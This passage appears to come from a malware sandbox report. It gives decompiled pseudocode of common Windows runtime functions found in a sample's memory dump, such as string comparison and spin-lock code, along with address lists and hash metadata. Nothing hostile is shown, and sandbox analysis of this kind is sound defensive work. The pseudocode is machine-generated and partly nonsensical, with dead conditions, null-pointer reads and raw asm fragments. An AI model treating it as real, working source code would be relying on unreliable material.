							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1156d5c; // 0x7fb40654
							_t84 =  *0x1156d5c; // 0x7fb40654
							_t87 =  *0x1156d5c; // 0x7fb40654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E010AF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                            0x01092ae4
                                                                                                            0x01092aec
                                                                                                            0x01092aef
                                                                                                            0x01092af4
                                                                                                            0x01092af7
                                                                                                            0x01092afd
                                                                                                            0x01092b92
                                                                                                            0x01092b92
                                                                                                            0x01092b97
                                                                                                            0x01092b9c
                                                                                                            0x01092b9c
                                                                                                            0x01092b03
                                                                                                            0x01092b06
                                                                                                            0x01092b09
                                                                                                            0x01092b09
                                                                                                            0x01092b0f
                                                                                                            0x01092b15
                                                                                                            0x01092b15
                                                                                                            0x01092b1b
                                                                                                            0x01092b1e
                                                                                                            0x01092b21
                                                                                                            0x01092b26
                                                                                                            0x01092b29
                                                                                                            0x01092b81
                                                                                                            0x01092b84
                                                                                                            0x01092c0e
                                                                                                            0x01092c15
                                                                                                            0x01092c24
                                                                                                            0x01092c24
                                                                                                            0x01092b8a
                                                                                                            0x01092b8a
                                                                                                            0x01092b8a
                                                                                                            0x01092b8a
                                                                                                            0x01092b90
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092b4a
                                                                                                            0x01092b4a
                                                                                                            0x01092b4d
                                                                                                            0x01092b53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092b55
                                                                                                            0x01092b58
                                                                                                            0x01092bb7
                                                                                                            0x010d5d1b
                                                                                                            0x010d5d37
                                                                                                            0x010d5d47
                                                                                                            0x010d5d53
                                                                                                            0x01092bbd
                                                                                                            0x01092bbd
                                                                                                            0x01092bbd
                                                                                                            0x01092bb7
                                                                                                            0x01092b5d
                                                                                                            0x01092c2f
                                                                                                            0x010d5d5b
                                                                                                            0x010d5d77
                                                                                                            0x010d5d87
                                                                                                            0x010d5d93
                                                                                                            0x01092c35
                                                                                                            0x01092c35
                                                                                                            0x01092c35
                                                                                                            0x01092c2f
                                                                                                            0x01092b65
                                                                                                            0x01092b9f
                                                                                                            0x01092ba2
                                                                                                            0x01092b67
                                                                                                            0x01092b67
                                                                                                            0x01092b69
                                                                                                            0x01092b6b
                                                                                                            0x01092b6e
                                                                                                            0x01092bc9
                                                                                                            0x01092bcc
                                                                                                            0x01092bcf
                                                                                                            0x01092bd4
                                                                                                            0x01092bd6
                                                                                                            0x01092bd6
                                                                                                            0x01092bdb
                                                                                                            0x01092c02
                                                                                                            0x01092c05
                                                                                                            0x01092c07
                                                                                                            0x00000000
                                                                                                            0x01092c07
                                                                                                            0x01092be0
                                                                                                            0x01092c00
                                                                                                            0x01092c3f
                                                                                                            0x01092c3f
                                                                                                            0x00000000
                                                                                                            0x01092c00
                                                                                                            0x01092be5
                                                                                                            0x01092be7
                                                                                                            0x01092bec
                                                                                                            0x01092bf4
                                                                                                            0x01092bf6
                                                                                                            0x00000000
                                                                                                            0x01092bf6
                                                                                                            0x01092b70
                                                                                                            0x01092b76
                                                                                                            0x01092b2b
                                                                                                            0x01092b2b
                                                                                                            0x01092b2d
                                                                                                            0x01092b2f
                                                                                                            0x01092b32
                                                                                                            0x01092b35
                                                                                                            0x01092b3a
                                                                                                            0x00000000
                                                                                                            0x01092b40
                                                                                                            0x01092b43
                                                                                                            0x01092b45
                                                                                                            0x01092b47
                                                                                                            0x01092b4a
                                                                                                            0x01092b4d
                                                                                                            0x01092b53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092b53
                                                                                                            0x01092b78
                                                                                                            0x01092b78
                                                                                                            0x01092b7b
                                                                                                            0x01092b7e
                                                                                                            0x00000000
                                                                                                            0x01092b7e
                                                                                                            0x01092b76
                                                                                                            0x01092ba5
                                                                                                            0x01092ba5
                                                                                                            0x01092ba8
                                                                                                            0x01092bad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092baf
                                                                                                            0x01092baf
                                                                                                            0x01092bc2
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0212c253ed8106a05deb7fad5dab2a659761117a2948afaa627556a525715313
                                                                                                            • Instruction ID: 6f2e63d6229b369e08489e0b440e7a38a8051b53a01be4b5092fa2363e0c32bc
                                                                                                            • Opcode Fuzzy Hash: 0212c253ed8106a05deb7fad5dab2a659761117a2948afaa627556a525715313
                                                                                                            • Instruction Fuzzy Hash: 2E51B276A00119DFCF18DF1DC8A09BDB7F1FB98700715845AE8D69B315D730AA91DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0112AE44 Relevance: .2, Instructions: 152COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E0112AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0112C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0112ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0112FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0112EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01087D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01121608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01131536(0x1158ae4, (_t74 -  *0x1158b04 >> 0x14) + (_t74 -  *0x1158b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0112C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0112A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0110CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0112ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                                            0x0112ae44
                                                                                                            0x0112ae4c
                                                                                                            0x0112ae53
                                                                                                            0x0112ae55
                                                                                                            0x0112ae5c
                                                                                                            0x0112ae64
                                                                                                            0x0112ae68
                                                                                                            0x0112ae75
                                                                                                            0x0112ae75
                                                                                                            0x0112ae78
                                                                                                            0x0112ae7a
                                                                                                            0x0112ae7c
                                                                                                            0x0112ae7f
                                                                                                            0x0112aea8
                                                                                                            0x0112aeab
                                                                                                            0x0112aead
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112aeb3
                                                                                                            0x0112aeb8
                                                                                                            0x0112aebb
                                                                                                            0x0112aebd
                                                                                                            0x00000000
                                                                                                            0x0112ae81
                                                                                                            0x0112ae88
                                                                                                            0x0112ae8f
                                                                                                            0x0112ae9b
                                                                                                            0x0112ae96
                                                                                                            0x0112ae96
                                                                                                            0x0112ae96
                                                                                                            0x0112aea0
                                                                                                            0x0112aea3
                                                                                                            0x0112aebf
                                                                                                            0x0112aebf
                                                                                                            0x0112aec3
                                                                                                            0x0112aec9
                                                                                                            0x0112af0d
                                                                                                            0x0112af14
                                                                                                            0x0112af3d
                                                                                                            0x0112af3d
                                                                                                            0x0112af41
                                                                                                            0x0112af44
                                                                                                            0x0112af67
                                                                                                            0x0112af67
                                                                                                            0x0112af6a
                                                                                                            0x0112afca
                                                                                                            0x0112afd1
                                                                                                            0x00000000
                                                                                                            0x0112afd1
                                                                                                            0x0112af6c
                                                                                                            0x0112af6d
                                                                                                            0x0112af75
                                                                                                            0x0112af7c
                                                                                                            0x0112af7e
                                                                                                            0x0112af80
                                                                                                            0x0112af85
                                                                                                            0x0112af87
                                                                                                            0x0112af99
                                                                                                            0x0112af89
                                                                                                            0x0112af92
                                                                                                            0x0112af92
                                                                                                            0x0112af9e
                                                                                                            0x0112afa1
                                                                                                            0x0112afa3
                                                                                                            0x0112afa9
                                                                                                            0x0112afb0
                                                                                                            0x0112afb2
                                                                                                            0x0112afb4
                                                                                                            0x0112afbc
                                                                                                            0x0112afbc
                                                                                                            0x0112afb4
                                                                                                            0x0112afb0
                                                                                                            0x00000000
                                                                                                            0x0112afa1
                                                                                                            0x0112af4f
                                                                                                            0x0112af57
                                                                                                            0x0112af5c
                                                                                                            0x0112af5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112af60
                                                                                                            0x0112af64
                                                                                                            0x0112af64
                                                                                                            0x00000000
                                                                                                            0x0112af64
                                                                                                            0x0112af1a
                                                                                                            0x0112af25
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112af27
                                                                                                            0x0112af28
                                                                                                            0x0112af33
                                                                                                            0x00000000
                                                                                                            0x0112aed0
                                                                                                            0x0112aed0
                                                                                                            0x0112aed2
                                                                                                            0x0112aee1
                                                                                                            0x0112aee4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112aee6
                                                                                                            0x0112aeec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112aefb
                                                                                                            0x0112af07
                                                                                                            0x0112afd3
                                                                                                            0x0112afdb
                                                                                                            0x0112afdb
                                                                                                            0x00000000
                                                                                                            0x0112af07
                                                                                                            0x0112aed6
                                                                                                            0x0112aed8
                                                                                                            0x0112aedf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112aedf
                                                                                                            0x0112aec9

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f52bbaaa4a378400a096f057765d0c8701fb81810cb4ec8f82d61640ddd78654
                                                                                                            • Instruction ID: edf3ec5ca83870ed3d7b97fb118d9ce669610ec1cc260cf06b58a2c24e43529c
                                                                                                            • Opcode Fuzzy Hash: f52bbaaa4a378400a096f057765d0c8701fb81810cb4ec8f82d61640ddd78654
                                                                                                            • Instruction Fuzzy Hash: 104108717007329BD72EDB29E884F3FB799AF84610F044619F92687AD0D738D822C792
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108DBE9 Relevance: .1, Instructions: 149COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E0108DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0106CC50(E01064510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01087D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01138ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01082280(_t58, _v44);
						E0108DD82(_v44, _t102, _t98);
						E0108B944(_t102, _v5);
						return E0107FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1158628; // 0x0
							_v28 = _t67;
							_t68 =  *0x115862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1158628; // 0x0
						_t105 = _v28;
						_t80 =  *0x115862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x112fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                            0x0108dbe9
                                                                                                            0x0108dbf2
                                                                                                            0x0108dbf7
                                                                                                            0x0108dbf9
                                                                                                            0x0108dbfc
                                                                                                            0x0108dc00
                                                                                                            0x0108dc03
                                                                                                            0x0108dc14
                                                                                                            0x0108dd54
                                                                                                            0x0108dd54
                                                                                                            0x0108dd54
                                                                                                            0x0108dc18
                                                                                                            0x0108dc1d
                                                                                                            0x0108dc1d
                                                                                                            0x0108dc32
                                                                                                            0x0108dc3b
                                                                                                            0x0108dc3e
                                                                                                            0x0108dc46
                                                                                                            0x0108dd5b
                                                                                                            0x0108dd62
                                                                                                            0x0108dd64
                                                                                                            0x0108dd67
                                                                                                            0x0108dd69
                                                                                                            0x0108dd6b
                                                                                                            0x0108dd6e
                                                                                                            0x0108dd70
                                                                                                            0x0108dd73
                                                                                                            0x0108dd73
                                                                                                            0x00000000
                                                                                                            0x0108dc4c
                                                                                                            0x0108dc4e
                                                                                                            0x010d3ae3
                                                                                                            0x010d3ae8
                                                                                                            0x010d3aea
                                                                                                            0x0108dce7
                                                                                                            0x0108dce9
                                                                                                            0x0108dcec
                                                                                                            0x0108dcee
                                                                                                            0x0108dcf0
                                                                                                            0x0108dcf3
                                                                                                            0x0108dcf5
                                                                                                            0x010d3af2
                                                                                                            0x010d3af5
                                                                                                            0x010d3af5
                                                                                                            0x0108dd06
                                                                                                            0x0108dd08
                                                                                                            0x0108dd0b
                                                                                                            0x0108dd12
                                                                                                            0x010d3b08
                                                                                                            0x0108dd18
                                                                                                            0x0108dd18
                                                                                                            0x0108dd18
                                                                                                            0x0108dd20
                                                                                                            0x0108dd23
                                                                                                            0x010d3b16
                                                                                                            0x010d3b16
                                                                                                            0x0108dd29
                                                                                                            0x0108dd2d
                                                                                                            0x0108dd36
                                                                                                            0x0108dd40
                                                                                                            0x0108dd51
                                                                                                            0x0108dd51
                                                                                                            0x0108dc54
                                                                                                            0x0108dc59
                                                                                                            0x0108dc59
                                                                                                            0x0108dc5e
                                                                                                            0x0108dc5e
                                                                                                            0x0108dc63
                                                                                                            0x0108dc66
                                                                                                            0x0108dc6b
                                                                                                            0x0108dc78
                                                                                                            0x0108dc7b
                                                                                                            0x0108dc81
                                                                                                            0x0108dc81
                                                                                                            0x0108dc83
                                                                                                            0x0108dc89
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108dd7b
                                                                                                            0x0108dd7b
                                                                                                            0x0108dc8f
                                                                                                            0x0108dc8f
                                                                                                            0x0108dc92
                                                                                                            0x0108dc99
                                                                                                            0x0108dc9f
                                                                                                            0x0108dca5
                                                                                                            0x0108dcaa
                                                                                                            0x0108dcaa
                                                                                                            0x0108dcb3
                                                                                                            0x0108dcb8
                                                                                                            0x0108dcbb
                                                                                                            0x0108dcc1
                                                                                                            0x0108dccf
                                                                                                            0x0108dcd2
                                                                                                            0x0108dcd5
                                                                                                            0x0108dcd7
                                                                                                            0x0108dcda
                                                                                                            0x0108dcdc
                                                                                                            0x0108dcdc
                                                                                                            0x0108dce2
                                                                                                            0x0108dce4
                                                                                                            0x00000000
                                                                                                            0x0108dce4

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab6ae14bf3f2a0d7ca559090c0d02f8aa275ad6084648eed94d23ec369f4b3f9
                                                                                                            • Instruction ID: 38aaf1e45c80fe048cc99ee2b8bc8aff2cc611412ccecba042d4c239ac4bf294
                                                                                                            • Opcode Fuzzy Hash: ab6ae14bf3f2a0d7ca559090c0d02f8aa275ad6084648eed94d23ec369f4b3f9
                                                                                                            • Instruction Fuzzy Hash: ED519171A04706DFCB14EFACC490A9EBBF1BF48310F248259D5D5AB385DB30A944CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0107EF40 Relevance: .1, Instructions: 147COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E0107EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01069080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7738c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01062D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                            0x0107ef4b
                                                                                                            0x0107ef4d
                                                                                                            0x0107ef57
                                                                                                            0x0107f0bd
                                                                                                            0x0107f0c2
                                                                                                            0x0107f0d2
                                                                                                            0x0107f0d2
                                                                                                            0x0107f0c2
                                                                                                            0x0107ef5d
                                                                                                            0x0107ef5f
                                                                                                            0x0107ef67
                                                                                                            0x0107ef6a
                                                                                                            0x0107ef6d
                                                                                                            0x0107ef74
                                                                                                            0x0107ef7f
                                                                                                            0x0107ef82
                                                                                                            0x0107ef82
                                                                                                            0x0107ef86
                                                                                                            0x0107ef88
                                                                                                            0x0107ef8c
                                                                                                            0x0107ef8f
                                                                                                            0x0107ef8f
                                                                                                            0x0107ef8f
                                                                                                            0x00000000
                                                                                                            0x0107ef91
                                                                                                            0x0107ef93
                                                                                                            0x0107efc4
                                                                                                            0x0107efc4
                                                                                                            0x0107efc4
                                                                                                            0x0107efca
                                                                                                            0x0107efd0
                                                                                                            0x0107f0a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107f0af
                                                                                                            0x010cbb06
                                                                                                            0x010cbb0a
                                                                                                            0x0107f0b5
                                                                                                            0x0107f0b5
                                                                                                            0x0107f0b5
                                                                                                            0x0107f0b5
                                                                                                            0x00000000
                                                                                                            0x0107efd6
                                                                                                            0x0107efd9
                                                                                                            0x0107f0de
                                                                                                            0x0107f0e2
                                                                                                            0x0107efdf
                                                                                                            0x0107efdf
                                                                                                            0x0107efdf
                                                                                                            0x0107efe5
                                                                                                            0x010cbafc
                                                                                                            0x010cbafc
                                                                                                            0x0107efe5
                                                                                                            0x0107efeb
                                                                                                            0x0107efed
                                                                                                            0x0107f00f
                                                                                                            0x0107f011
                                                                                                            0x0107f01a
                                                                                                            0x0107f01d
                                                                                                            0x0107f021
                                                                                                            0x0107f028
                                                                                                            0x0107f029
                                                                                                            0x0107f029
                                                                                                            0x0107f02c
                                                                                                            0x00000000
                                                                                                            0x0107f02c
                                                                                                            0x0107eff3
                                                                                                            0x0107eff9
                                                                                                            0x0107f0ea
                                                                                                            0x0107f0ed
                                                                                                            0x0107f0ef
                                                                                                            0x00000000
                                                                                                            0x0107f0ef
                                                                                                            0x0107f003
                                                                                                            0x010cbb12
                                                                                                            0x0107f045
